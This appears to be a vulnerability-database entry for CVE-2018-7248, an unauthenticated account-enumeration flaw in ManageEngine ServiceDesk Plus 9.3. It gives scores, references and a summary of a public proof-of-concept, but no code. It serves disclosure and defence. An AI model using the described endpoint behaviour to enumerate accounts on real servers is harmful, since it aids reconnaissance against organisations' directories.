CVE-2018-7248

MEDIUM

Zoho ManageEngine ServiceDesk Plus 9.3 Build 9317 - Info Disclosure

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2018-7248. PoCs published by e-sterling.

AI-analyzed exploit summary The repository contains a functional Python script that exploits CVE-2018-7248, an unauthenticated information disclosure vulnerability in ManageEngine ServiceDesk Plus. The script enumerates Active Directory users by querying an exposed API endpoint that leaks user domain information.

Description

An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3 Build 9317. Unauthenticated users are able to validate domain user accounts by sending a request containing the username to an API endpoint. The endpoint will return the user's logon domain if the accounts exists, or 'null' if it does not.

Exploits (1)

gitlab WORKING POC 1 stars
by e-sterling · poc
https://gitlab.com/e-sterling/cve-2018-7248

The repository contains a functional Python script that exploits CVE-2018-7248, an unauthenticated information disclosure vulnerability in ManageEngine ServiceDesk Plus. The script enumerates Active Directory users by querying an exposed API endpoint that leaks user domain information.

Classification
Working Poc 95%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: ManageEngine ServiceDesk Plus
No auth needed
Prerequisites: Network access to the target ManageEngine ServiceDesk Plus server
devstral-2 · analyzed Feb 23, 2026 Full analysis →

References (3)

Core 3
Core References
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/104287
Exploit, Third Party Advisory x_refsource_misc
https://gitlab.com/e-sterling/cve-2018-7248

Scores

CVSS v3 5.3
EPSS 0.0643
EPSS Percentile 92.8%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

Status published
Products (1)
zohocorp/manageengine_servicedesk_plus 9.3 9317
Published May 11, 2018
Tracked Since Feb 18, 2026